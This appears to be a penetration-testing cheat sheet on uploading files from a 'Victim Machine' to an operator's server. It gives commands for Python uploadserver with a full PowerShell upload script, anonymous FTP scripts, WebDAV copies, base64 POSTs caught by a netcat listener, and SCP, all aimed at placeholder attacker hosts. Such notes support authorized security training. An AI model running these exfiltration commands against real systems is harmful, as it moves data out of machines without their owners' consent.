Note

• Some Operations May Be Blocked Due to Windows Firewall - Policies.
• Outbound Traffic is usually Disallowed using HTTP (TCP/80) and HTTPS (TCP/443) Protocols.
• The Default Ports that the Services use Down Below Might be Blocked Or Filtered by IDS - Firewall - Policies.

Note

• Server - Basic Queries to setup a Running Server.
• Target - These Operations should be done on the Victim Machine.
• Interactive - We Log into a Remote Machine via RDP - SSH etc..
• Non Interactive - Commands run in their own Subshell and this Shell is not Interactive. Opens to Execute but closes Immediately.

Python Web Server

Server HTTP/S

:: Requires [uploadserver] Package && [PSUpload.ps1] Powershell Script
:: HTTP Server
python3 -m uploadserver

:: HTTPS Server
:: Create a Self-Signed Certificate
openssl req -x509 -out server.pem -keyout server.pem -newkey rsa:2048 -nodes -sha256 -subj '/CN=server'

:: Start the Web Server
mkdir https && cd https
python3 -m uploadserver 443 --server-certificate /<OPENSSL [server.pem] Location>

Target

# Import the PowerShell Script
Import-Module .\PSUpload.ps1

# Upload the File to the Upload Server
# Default Folder [/upload]
Invoke-FileUpload -Uri http://<IP>/upload -File C:\<File Name>

PowerShell Script

<#

PowerShell Script to upload files using uploadserver module 
Github: https://github.com/Densaugeo/uploadserver

To execute the server run in your Linux Machine:
pip3 install uploadserver
python3 -m uploadserver

Example PS:
Invoke-FileUpload -File C:\Users\plaintext\Desktop\20200717080254_BloodHound.zip -Uri http://192.168.49.128:8000/upload

References: https://gist.github.com/arichika/91a8b1f60c87512401e320a614099283

#>

function Invoke-FileUpload {
    Param (
        [Parameter(Position = 0, Mandatory = $True)]
        [String]$File,
        
        [Parameter(Position = 1, Mandatory = $True)]
        [String]$Uri
        )
    
    $FileToUpload = Get-ChildItem -File "$File"
    
    $UTF8woBOM = New-Object "System.Text.UTF8Encoding" -ArgumentList @($false)
    $boundary = '----BCA246E0-E2CF-48ED-AACE-58B35D68B513'
    $tempFile = New-TemporaryFile
    Remove-Item $tempFile -Force -ErrorAction Ignore
    $sw = New-Object System.IO.StreamWriter($tempFile, $true, $UTF8woBOM)
    $fileName = [System.IO.Path]::GetFileName($FileToUpload.FullName)
    $sw.Write("--$boundary`r`nContent-Disposition: form-data;name=`"files`";filename=`"$fileName`"`r`n`r`n")
    $sw.Close()
    $fs = New-Object System.IO.FileStream($tempFile, [System.IO.FileMode]::Append)
    $bw = New-Object System.IO.BinaryWriter($fs)
    $fileBinary = [System.IO.File]::ReadAllBytes($FileToUpload.FullName)
    $bw.Write($fileBinary)
    $bw.Close()
    $sw = New-Object System.IO.StreamWriter($tempFile, $true, $UTF8woBOM)
    $sw.Write("`r`n--$boundary--`r`n")
    $sw.Close()
    
    Invoke-RestMethod -Method POST -Uri $uri -ContentType "multipart/form-data; boundary=$boundary" -InFile $tempFile
    
    $FileHash = Get-FileHash -Path "$File" -Algorith MD5 
    Write-Host "[+] File Uploaded: " $FileToUpload.FullName
    Write-Host "[+] FileHash: " $FileHash.Hash
}

FTP

Server

:: Requires [pyftpdlib] Package 
:: Start The Server
python3 -m pyftpdlib --port 21

Interactive

:: Interactive SHELL
:: Access The Server
:: [USER: anonymous PASSWORD: anonymous]
:: [PUT] - Upload The File
ftp ➜ open ➜ IP ➜ PUT "File Name"

Non Interactive

:: Non Interactive SHELL
:: Target
echo open IP > FTP.txt
echo USER anonymous >> FTP.txt
echo anonymous >> FTP.txt
echo PUT FILE.exe >> FTP.txt
echo bye >> FTP.txt

:: Upload The File
ftp -v -n -s:FTP.txt

# PSH Upload Method
(New-Object Net.WebClient).UploadFile('ftp://<IP>/<File Name>', '<Output>')

WebDav

Server

:: Requires [wsgidav - cheroot] Packages
wsgidav --host=0.0.0.0 --port=80 --root=/tmp --auth=anonymous

Target

Note

DavWWWRoot is a Special Keyword recognized by the Windows Shell. No such folder exists on your WebDAV Server.

The Keyword tells the Mini-Redirector Driver, which handles WebDAV Requests that you are Connecting to the Root of the WebDAV Server.

We can avoid using this Keyword if we specify a Folder that exists on our Server when Connecting to the Server.

:: List WebDav Share Contents
dir \\<IP>\DavWWWRoot

:: Upload Files
copy C:<File Name> \\<IP>\DavWWWRoot\
copy C:<File Name> \\<IP>\<Share Folder>\

PSH [BASE64]

# PowerShell Base64 Encode && Decode
[Convert]::ToBase64String((Get-Content -path "C:\<File Name>" -Encoding byte))

# Compare the File Hash
Get-FileHash "C:\<File Name>" -Algorithm MD5

# Decode Base64
echo "<BASE64>" | base64 -d > <Output>

# [Invoke-WebRequest] Method 
# [Invoke-RestMethod] is also Available
$b64 = [System.convert]::ToBase64String((Get-Content -Path 'C:\<File Name>' -Encoding Byte))
Invoke-WebRequest -Uri http://<IP>:<Netcat Port>/ -Method POST -Body $b64

# We can catch the Base64 Data with [Netcat]
nc -nvlp <PORT>

# Decode Base64
echo "<BASE64>" | base64 -d -w 0 > <Output>

SCP

:: Copy Local File to the Remote System
scp -P 22 "<File Name>" <Username>@<IP>:/<Output>